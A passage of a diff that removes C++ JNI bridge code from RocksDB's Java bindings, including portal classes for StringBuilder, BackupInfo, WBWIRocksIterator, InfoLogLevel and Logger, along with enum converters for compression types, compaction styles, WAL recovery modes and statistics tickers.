-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getArrayJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "[B");
-  }
-
-  /**
-   * Creates a new 2-dimensional Java Byte Array byte[][]
-   *
-   * @param env A pointer to the Java environment
-   * @param len The size of the first dimension
-   *
-   * @return A reference to the Java byte[][] or nullptr if an exception occurs
-   */
-  static jobjectArray new2dByteArray(JNIEnv* env, const jsize len) {
-    jclass clazz = getArrayJClass(env);
-    if(clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    return env->NewObjectArray(len, clazz, nullptr);
-  }
-
-  /**
-   * Get the Java Method: Byte#byteValue
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getByteValueMethod(JNIEnv* env) {
-    jclass clazz = getJClass(env);
-    if(clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(clazz, "byteValue", "()B");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for java.lang.StringBuilder
-class StringBuilderJni : public JavaClass {
-  public:
-  /**
-   * Get the Java Class java.lang.StringBuilder
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/lang/StringBuilder");
-  }
-
-  /**
-   * Get the Java Method: StringBuilder#append
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getListAddMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "append",
-            "(Ljava/lang/String;)Ljava/lang/StringBuilder;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Appends a C-style string to a StringBuilder
-   *
-   * @param env A pointer to the Java environment
-   * @param jstring_builder Reference to a java.lang.StringBuilder
-   * @param c_str A C-style string to append to the StringBuilder
-   *
-   * @return A reference to the updated StringBuilder, or a nullptr if
-   *     an exception occurs
-   */
-  static jobject append(JNIEnv* env, jobject jstring_builder,
-      const char* c_str) {
-    jmethodID mid = getListAddMethodId(env);
-    if(mid == nullptr) {
-      // exception occurred accessing class or method
-      return nullptr;
-    }
-
-    jstring new_value_str = env->NewStringUTF(c_str);
-    if(new_value_str == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    jobject jresult_string_builder =
-        env->CallObjectMethod(jstring_builder, mid, new_value_str);
-    if(env->ExceptionCheck()) {
-      // exception occurred
-      env->DeleteLocalRef(new_value_str);
-      return nullptr;
-    }
-
-    return jresult_string_builder;
-  }
-};
-
-// The portal class for org.rocksdb.BackupInfo
-class BackupInfoJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.BackupInfo
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/BackupInfo");
-  }
-
-  /**
-   * Constructs a BackupInfo object
-   *
-   * @param env A pointer to the Java environment
-   * @param backup_id id of the backup
-   * @param timestamp timestamp of the backup
-   * @param size size of the backup
-   * @param number_files number of files related to the backup
-   *
-   * @return A reference to a Java BackupInfo object, or a nullptr if an
-   *     exception occurs
-   */
-  static jobject construct0(JNIEnv* env, uint32_t backup_id, int64_t timestamp,
-      uint64_t size, uint32_t number_files) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "(IJJI)V");
-    if(mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    jobject jbackup_info =
-        env->NewObject(jclazz, mid, backup_id, timestamp, size, number_files);
-    if(env->ExceptionCheck()) {
-      return nullptr;
-    }
-
-    return jbackup_info;
-  }
-};
-
-class BackupInfoListJni {
- public:
-  /**
-   * Converts a C++ std::vector<BackupInfo> object to
-   * a Java ArrayList<org.rocksdb.BackupInfo> object
-   *
-   * @param env A pointer to the Java environment
-   * @param backup_infos A vector of BackupInfo
-   *
-   * @return Either a reference to a Java ArrayList object, or a nullptr
-   *     if an exception occurs
-   */
-  static jobject getBackupInfo(JNIEnv* env,
-      std::vector<BackupInfo> backup_infos) {
-    jclass jarray_list_clazz = rocksdb::ListJni::getArrayListClass(env);
-    if(jarray_list_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jmethodID cstr_mid = rocksdb::ListJni::getArrayListConstructorMethodId(env);
-    if(cstr_mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    jmethodID add_mid = rocksdb::ListJni::getListAddMethodId(env);
-    if(add_mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    // create java list
-    jobject jbackup_info_handle_list =
-        env->NewObject(jarray_list_clazz, cstr_mid, backup_infos.size());
-    if(env->ExceptionCheck()) {
-      // exception occurred constructing object
-      return nullptr;
-    }
-
-    // insert in java list
-    auto end = backup_infos.end();
-    for (auto it = backup_infos.begin(); it != end; ++it) {
-      auto backup_info = *it;
-
-      jobject obj = rocksdb::BackupInfoJni::construct0(env,
-          backup_info.backup_id,
-          backup_info.timestamp,
-          backup_info.size,
-          backup_info.number_files);
-      if(env->ExceptionCheck()) {
-        // exception occurred constructing object
-        if(obj != nullptr) {
-          env->DeleteLocalRef(obj);
-        }
-        if(jbackup_info_handle_list != nullptr) {
-          env->DeleteLocalRef(jbackup_info_handle_list);
-        }
-        return nullptr;
-      }
-
-      jboolean rs =
-          env->CallBooleanMethod(jbackup_info_handle_list, add_mid, obj);
-      if(env->ExceptionCheck() || rs == JNI_FALSE) {
-        // exception occurred calling method, or could not add
-        if(obj != nullptr) {
-          env->DeleteLocalRef(obj);
-        }
-        if(jbackup_info_handle_list != nullptr) {
-          env->DeleteLocalRef(jbackup_info_handle_list);
-        }
-        return nullptr;
-      }
-    }
-
-    return jbackup_info_handle_list;
-  }
-};
-
-// The portal class for org.rocksdb.WBWIRocksIterator
-class WBWIRocksIteratorJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WBWIRocksIterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/WBWIRocksIterator");
-  }
-
-  /**
-   * Get the Java Field: WBWIRocksIterator#entry
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Field ID or nullptr if the class or field id could not
-   *     be retieved
-   */
-  static jfieldID getWriteEntryField(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jfieldID fid =
-        env->GetFieldID(jclazz, "entry",
-            "Lorg/rocksdb/WBWIRocksIterator$WriteEntry;");
-    assert(fid != nullptr);
-    return fid;
-  }
-
-  /**
-   * Gets the value of the WBWIRocksIterator#entry
-   *
-   * @param env A pointer to the Java environment 
-   * @param jwbwi_rocks_iterator A reference to a WBWIIterator
-   *
-   * @return A reference to a Java WBWIRocksIterator.WriteEntry object, or
-   *     a nullptr if an exception occurs
-   */
-  static jobject getWriteEntry(JNIEnv* env, jobject jwbwi_rocks_iterator) {
-    assert(jwbwi_rocks_iterator != nullptr);
-
-    jfieldID jwrite_entry_field = getWriteEntryField(env);
-    if(jwrite_entry_field == nullptr) {
-      // exception occurred accessing the field
-      return nullptr;
-    }
-
-    jobject jwe = env->GetObjectField(jwbwi_rocks_iterator, jwrite_entry_field);
-    assert(jwe != nullptr);
-    return jwe;
-  }
-};
-
-// The portal class for org.rocksdb.WBWIRocksIterator.WriteType
-class WriteTypeJni : public JavaClass {
- public:
-    /**
-     * Get the PUT enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject PUT(JNIEnv* env) {
-      return getEnum(env, "PUT");
-    }
-
-    /**
-     * Get the MERGE enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject MERGE(JNIEnv* env) {
-      return getEnum(env, "MERGE");
-    }
-
-    /**
-     * Get the DELETE enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject DELETE(JNIEnv* env) {
-      return getEnum(env, "DELETE");
-    }
-
-    /**
-     * Get the LOG enum field value of WBWIRocksIterator.WriteType
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject LOG(JNIEnv* env) {
-      return getEnum(env, "LOG");
-    }
-
- private:
-  /**
-   * Get the Java Class org.rocksdb.WBWIRocksIterator.WriteType
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/WBWIRocksIterator$WriteType");
-  }
-
-  /**
-   * Get an enum field of org.rocksdb.WBWIRocksIterator.WriteType
-   *
-   * @param env A pointer to the Java environment
-   * @param name The name of the enum field
-   *
-   * @return A reference to the enum field value or a nullptr if
-   *     the enum field value could not be retrieved
-   */
-  static jobject getEnum(JNIEnv* env, const char name[]) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jfieldID jfid =
-        env->GetStaticFieldID(jclazz, name,
-            "Lorg/rocksdb/WBWIRocksIterator$WriteType;");
-    if(env->ExceptionCheck()) {
-      // exception occurred while getting field
-      return nullptr;
-    } else if(jfid == nullptr) {
-      return nullptr;
-    }
-
-    jobject jwrite_type = env->GetStaticObjectField(jclazz, jfid);
-    assert(jwrite_type != nullptr);
-    return jwrite_type;
-  }
-};
-
-// The portal class for org.rocksdb.WBWIRocksIterator.WriteEntry
-class WriteEntryJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WBWIRocksIterator.WriteEntry
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-    static jclass getJClass(JNIEnv* env) {
-      return JavaClass::getJClass(env, "org/rocksdb/WBWIRocksIterator$WriteEntry");
-    }
-};
-
-// The portal class for org.rocksdb.InfoLogLevel
-class InfoLogLevelJni : public JavaClass {
- public:
-    /**
-     * Get the DEBUG_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject DEBUG_LEVEL(JNIEnv* env) {
-      return getEnum(env, "DEBUG_LEVEL");
-    }
-
-    /**
-     * Get the INFO_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject INFO_LEVEL(JNIEnv* env) {
-      return getEnum(env, "INFO_LEVEL");
-    }
-
-    /**
-     * Get the WARN_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject WARN_LEVEL(JNIEnv* env) {
-      return getEnum(env, "WARN_LEVEL");
-    }
-
-    /**
-     * Get the ERROR_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject ERROR_LEVEL(JNIEnv* env) {
-      return getEnum(env, "ERROR_LEVEL");
-    }
-
-    /**
-     * Get the FATAL_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject FATAL_LEVEL(JNIEnv* env) {
-      return getEnum(env, "FATAL_LEVEL");
-    }
-
-    /**
-     * Get the HEADER_LEVEL enum field value of InfoLogLevel
-     *
-     * @param env A pointer to the Java environment
-     *
-     * @return A reference to the enum field value or a nullptr if
-     *     the enum field value could not be retrieved
-     */
-    static jobject HEADER_LEVEL(JNIEnv* env) {
-      return getEnum(env, "HEADER_LEVEL");
-    }
-
- private:
-  /**
-   * Get the Java Class org.rocksdb.InfoLogLevel
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/InfoLogLevel");
-  }
-
-  /**
-   * Get an enum field of org.rocksdb.InfoLogLevel
-   *
-   * @param env A pointer to the Java environment
-   * @param name The name of the enum field
-   *
-   * @return A reference to the enum field value or a nullptr if
-   *     the enum field value could not be retrieved
-   */
-  static jobject getEnum(JNIEnv* env, const char name[]) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jfieldID jfid =
-        env->GetStaticFieldID(jclazz, name, "Lorg/rocksdb/InfoLogLevel;");
-    if(env->ExceptionCheck()) {
-      // exception occurred while getting field
-      return nullptr;
-    } else if(jfid == nullptr) {
-      return nullptr;
-    }
-
-    jobject jinfo_log_level = env->GetStaticObjectField(jclazz, jfid);
-    assert(jinfo_log_level != nullptr);
-    return jinfo_log_level;
-  }
-};
-
-// The portal class for org.rocksdb.Logger
-class LoggerJni : public RocksDBNativeClass<
-    std::shared_ptr<rocksdb::LoggerJniCallback>*, LoggerJni> {
- public:
-  /**
-   * Get the Java Class org/rocksdb/Logger
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Logger");
-  }
-
-  /**
-   * Get the Java Method: Logger#log
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getLogMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "log",
-            "(Lorg/rocksdb/InfoLogLevel;Ljava/lang/String;)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.TransactionLogIterator.BatchResult
-class BatchResultJni : public JavaClass {
-  public:
-  /**
-   * Get the Java Class org.rocksdb.TransactionLogIterator.BatchResult
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env,
-        "org/rocksdb/TransactionLogIterator$BatchResult");
-  }
-
-  /**
-   * Create a new Java org.rocksdb.TransactionLogIterator.BatchResult object
-   * with the same properties as the provided C++ rocksdb::BatchResult object
-   *
-   * @param env A pointer to the Java environment
-   * @param batch_result The rocksdb::BatchResult object
-   *
-   * @return A reference to a Java
-   *     org.rocksdb.TransactionLogIterator.BatchResult object,
-   *     or nullptr if an an exception occurs
-   */
-  static jobject construct(JNIEnv* env,
-      rocksdb::BatchResult& batch_result) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jmethodID mid = env->GetMethodID(
-      jclazz, "<init>", "(JJ)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      return nullptr;
-    }
-
-    jobject jbatch_result = env->NewObject(jclazz, mid,
-      batch_result.sequence, batch_result.writeBatchPtr.get());
-    if(jbatch_result == nullptr) {
-      // exception thrown: InstantiationException or OutOfMemoryError
-      return nullptr;
-    }
-
-    batch_result.writeBatchPtr.release();
-    return jbatch_result;
-  }
-};
-
-// The portal class for org.rocksdb.CompactionStopStyle
-class CompactionStopStyleJni {
- public:
-  // Returns the equivalent org.rocksdb.CompactionStopStyle for the provided
-  // C++ rocksdb::CompactionStopStyle enum
-  static jbyte toJavaCompactionStopStyle(
-      const rocksdb::CompactionStopStyle& compaction_stop_style) {
-    switch(compaction_stop_style) {
-      case rocksdb::CompactionStopStyle::kCompactionStopStyleSimilarSize:
-        return 0x0;
-      case rocksdb::CompactionStopStyle::kCompactionStopStyleTotalSize:
-        return 0x1;
-      default:
-        return 0x7F;  // undefined
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::CompactionStopStyle enum for the
-  // provided Java org.rocksdb.CompactionStopStyle
-  static rocksdb::CompactionStopStyle toCppCompactionStopStyle(
-      jbyte jcompaction_stop_style) {
-    switch(jcompaction_stop_style) {
-      case 0x0:
-        return rocksdb::CompactionStopStyle::kCompactionStopStyleSimilarSize;
-      case 0x1:
-        return rocksdb::CompactionStopStyle::kCompactionStopStyleTotalSize;
-      default:
-        // undefined/default
-        return rocksdb::CompactionStopStyle::kCompactionStopStyleSimilarSize;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.CompressionType
-class CompressionTypeJni {
- public:
-  // Returns the equivalent org.rocksdb.CompressionType for the provided
-  // C++ rocksdb::CompressionType enum
-  static jbyte toJavaCompressionType(
-      const rocksdb::CompressionType& compression_type) {
-    switch(compression_type) {
-      case rocksdb::CompressionType::kNoCompression:
-        return 0x0;
-      case rocksdb::CompressionType::kSnappyCompression:
-        return 0x1;
-      case rocksdb::CompressionType::kZlibCompression:
-        return 0x2;
-      case rocksdb::CompressionType::kBZip2Compression:
-        return 0x3;
-      case rocksdb::CompressionType::kLZ4Compression:
-        return 0x4;
-      case rocksdb::CompressionType::kLZ4HCCompression:
-        return 0x5;
-      case rocksdb::CompressionType::kXpressCompression:
-        return 0x6;
-      case rocksdb::CompressionType::kZSTD:
-        return 0x7;
-      case rocksdb::CompressionType::kDisableCompressionOption:
-      default:
-        return 0x7F;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::CompressionType enum for the
-  // provided Java org.rocksdb.CompressionType
-  static rocksdb::CompressionType toCppCompressionType(
-      jbyte jcompression_type) {
-    switch(jcompression_type) {
-      case 0x0:
-        return rocksdb::CompressionType::kNoCompression;
-      case 0x1:
-        return rocksdb::CompressionType::kSnappyCompression;
-      case 0x2:
-        return rocksdb::CompressionType::kZlibCompression;
-      case 0x3:
-        return rocksdb::CompressionType::kBZip2Compression;
-      case 0x4:
-        return rocksdb::CompressionType::kLZ4Compression;
-      case 0x5:
-        return rocksdb::CompressionType::kLZ4HCCompression;
-      case 0x6:
-        return rocksdb::CompressionType::kXpressCompression;
-      case 0x7:
-        return rocksdb::CompressionType::kZSTD;
-      case 0x7F:
-      default:
-        return rocksdb::CompressionType::kDisableCompressionOption;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.CompactionPriority
-class CompactionPriorityJni {
- public:
-  // Returns the equivalent org.rocksdb.CompactionPriority for the provided
-  // C++ rocksdb::CompactionPri enum
-  static jbyte toJavaCompactionPriority(
-      const rocksdb::CompactionPri& compaction_priority) {
-    switch(compaction_priority) {
-      case rocksdb::CompactionPri::kByCompensatedSize:
-        return 0x0;
-      case rocksdb::CompactionPri::kOldestLargestSeqFirst:
-        return 0x1;
-      case rocksdb::CompactionPri::kOldestSmallestSeqFirst:
-        return 0x2;
-      case rocksdb::CompactionPri::kMinOverlappingRatio:
-        return 0x3;
-      default:
-        return 0x0;  // undefined
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::CompactionPri enum for the
-  // provided Java org.rocksdb.CompactionPriority
-  static rocksdb::CompactionPri toCppCompactionPriority(
-      jbyte jcompaction_priority) {
-    switch(jcompaction_priority) {
-      case 0x0:
-        return rocksdb::CompactionPri::kByCompensatedSize;
-      case 0x1:
-        return rocksdb::CompactionPri::kOldestLargestSeqFirst;
-      case 0x2:
-        return rocksdb::CompactionPri::kOldestSmallestSeqFirst;
-      case 0x3:
-        return rocksdb::CompactionPri::kMinOverlappingRatio;
-      default:
-        // undefined/default
-        return rocksdb::CompactionPri::kByCompensatedSize;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.AccessHint
-class AccessHintJni {
- public:
-  // Returns the equivalent org.rocksdb.AccessHint for the provided
-  // C++ rocksdb::DBOptions::AccessHint enum
-  static jbyte toJavaAccessHint(
-      const rocksdb::DBOptions::AccessHint& access_hint) {
-    switch(access_hint) {
-      case rocksdb::DBOptions::AccessHint::NONE:
-        return 0x0;
-      case rocksdb::DBOptions::AccessHint::NORMAL:
-        return 0x1;
-      case rocksdb::DBOptions::AccessHint::SEQUENTIAL:
-        return 0x2;
-      case rocksdb::DBOptions::AccessHint::WILLNEED:
-        return 0x3;
-      default:
-        // undefined/default
-        return 0x1;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::DBOptions::AccessHint enum for the
-  // provided Java org.rocksdb.AccessHint
-  static rocksdb::DBOptions::AccessHint toCppAccessHint(jbyte jaccess_hint) {
-    switch(jaccess_hint) {
-      case 0x0:
-        return rocksdb::DBOptions::AccessHint::NONE;
-      case 0x1:
-        return rocksdb::DBOptions::AccessHint::NORMAL;
-      case 0x2:
-        return rocksdb::DBOptions::AccessHint::SEQUENTIAL;
-      case 0x3:
-        return rocksdb::DBOptions::AccessHint::WILLNEED;
-      default:
-        // undefined/default
-        return rocksdb::DBOptions::AccessHint::NORMAL;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.WALRecoveryMode
-class WALRecoveryModeJni {
- public:
-  // Returns the equivalent org.rocksdb.WALRecoveryMode for the provided
-  // C++ rocksdb::WALRecoveryMode enum
-  static jbyte toJavaWALRecoveryMode(
-      const rocksdb::WALRecoveryMode& wal_recovery_mode) {
-    switch(wal_recovery_mode) {
-      case rocksdb::WALRecoveryMode::kTolerateCorruptedTailRecords:
-        return 0x0;
-      case rocksdb::WALRecoveryMode::kAbsoluteConsistency:
-        return 0x1;
-      case rocksdb::WALRecoveryMode::kPointInTimeRecovery:
-        return 0x2;
-      case rocksdb::WALRecoveryMode::kSkipAnyCorruptedRecords:
-        return 0x3;
-      default:
-        // undefined/default
-        return 0x2;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::WALRecoveryMode enum for the
-  // provided Java org.rocksdb.WALRecoveryMode
-  static rocksdb::WALRecoveryMode toCppWALRecoveryMode(jbyte jwal_recovery_mode) {
-    switch(jwal_recovery_mode) {
-      case 0x0:
-        return rocksdb::WALRecoveryMode::kTolerateCorruptedTailRecords;
-      case 0x1:
-        return rocksdb::WALRecoveryMode::kAbsoluteConsistency;
-      case 0x2:
-        return rocksdb::WALRecoveryMode::kPointInTimeRecovery;
-      case 0x3:
-        return rocksdb::WALRecoveryMode::kSkipAnyCorruptedRecords;
-      default:
-        // undefined/default
-        return rocksdb::WALRecoveryMode::kPointInTimeRecovery;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.TickerType
-class TickerTypeJni {
- public:
-  // Returns the equivalent org.rocksdb.TickerType for the provided
-  // C++ rocksdb::Tickers enum
-  static jbyte toJavaTickerType(
-      const rocksdb::Tickers& tickers) {
-    switch(tickers) {
-      case rocksdb::Tickers::BLOCK_CACHE_MISS:
-        return 0x0;
-      case rocksdb::Tickers::BLOCK_CACHE_HIT:
-        return 0x1;
-      case rocksdb::Tickers::BLOCK_CACHE_ADD:
-        return 0x2;
-      case rocksdb::Tickers::BLOCK_CACHE_ADD_FAILURES:
-        return 0x3;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_MISS:
-        return 0x4;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_HIT:
-        return 0x5;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_ADD:
-        return 0x6;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_INSERT:
-        return 0x7;
-      case rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_EVICT:
-        return 0x8;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_MISS:
-        return 0x9;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_HIT:
-        return 0xA;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_ADD:
-        return 0xB;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_INSERT:
-        return 0xC;
-      case rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_EVICT:
-        return 0xD;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_MISS:
-        return 0xE;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_HIT:
-        return 0xF;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_ADD:
-        return 0x10;
-      case rocksdb::Tickers::BLOCK_CACHE_DATA_BYTES_INSERT:
-        return 0x11;
-      case rocksdb::Tickers::BLOCK_CACHE_BYTES_READ:
-        return 0x12;
-      case rocksdb::Tickers::BLOCK_CACHE_BYTES_WRITE:
-        return 0x13;
-      case rocksdb::Tickers::BLOOM_FILTER_USEFUL:
-        return 0x14;
-      case rocksdb::Tickers::PERSISTENT_CACHE_HIT:
-        return 0x15;
-      case rocksdb::Tickers::PERSISTENT_CACHE_MISS:
-        return 0x16;
-      case rocksdb::Tickers::SIM_BLOCK_CACHE_HIT:
-        return 0x17;
-      case rocksdb::Tickers::SIM_BLOCK_CACHE_MISS:
-        return 0x18;
-      case rocksdb::Tickers::MEMTABLE_HIT:
-        return 0x19;
-      case rocksdb::Tickers::MEMTABLE_MISS:
-        return 0x1A;
-      case rocksdb::Tickers::GET_HIT_L0:
-        return 0x1B;
-      case rocksdb::Tickers::GET_HIT_L1:
-        return 0x1C;
-      case rocksdb::Tickers::GET_HIT_L2_AND_UP:
-        return 0x1D;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_NEWER_ENTRY:
-        return 0x1E;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_OBSOLETE:
-        return 0x1F;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_RANGE_DEL:
-        return 0x20;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_USER:
-        return 0x21;
-      case rocksdb::Tickers::COMPACTION_RANGE_DEL_DROP_OBSOLETE:
-        return 0x22;
-      case rocksdb::Tickers::NUMBER_KEYS_WRITTEN:
-        return 0x23;
-      case rocksdb::Tickers::NUMBER_KEYS_READ:
-        return 0x24;
-      case rocksdb::Tickers::NUMBER_KEYS_UPDATED:
-        return 0x25;
-      case rocksdb::Tickers::BYTES_WRITTEN:
-        return 0x26;
-      case rocksdb::Tickers::BYTES_READ:
-        return 0x27;
-      case rocksdb::Tickers::NUMBER_DB_SEEK:
-        return 0x28;
-      case rocksdb::Tickers::NUMBER_DB_NEXT:
-        return 0x29;
-      case rocksdb::Tickers::NUMBER_DB_PREV:
-        return 0x2A;
-      case rocksdb::Tickers::NUMBER_DB_SEEK_FOUND:
-        return 0x2B;
-      case rocksdb::Tickers::NUMBER_DB_NEXT_FOUND:
-        return 0x2C;
-      case rocksdb::Tickers::NUMBER_DB_PREV_FOUND:
-        return 0x2D;
-      case rocksdb::Tickers::ITER_BYTES_READ:
-        return 0x2E;
-      case rocksdb::Tickers::NO_FILE_CLOSES:
-        return 0x2F;
-      case rocksdb::Tickers::NO_FILE_OPENS:
-        return 0x30;
-      case rocksdb::Tickers::NO_FILE_ERRORS:
-        return 0x31;
-      case rocksdb::Tickers::STALL_L0_SLOWDOWN_MICROS:
-        return 0x32;
-      case rocksdb::Tickers::STALL_MEMTABLE_COMPACTION_MICROS:
-        return 0x33;
-      case rocksdb::Tickers::STALL_L0_NUM_FILES_MICROS:
-        return 0x34;
-      case rocksdb::Tickers::STALL_MICROS:
-        return 0x35;
-      case rocksdb::Tickers::DB_MUTEX_WAIT_MICROS:
-        return 0x36;
-      case rocksdb::Tickers::RATE_LIMIT_DELAY_MILLIS:
-        return 0x37;
-      case rocksdb::Tickers::NO_ITERATORS:
-        return 0x38;
-      case rocksdb::Tickers::NUMBER_MULTIGET_CALLS:
-        return 0x39;
-      case rocksdb::Tickers::NUMBER_MULTIGET_KEYS_READ:
-        return 0x3A;
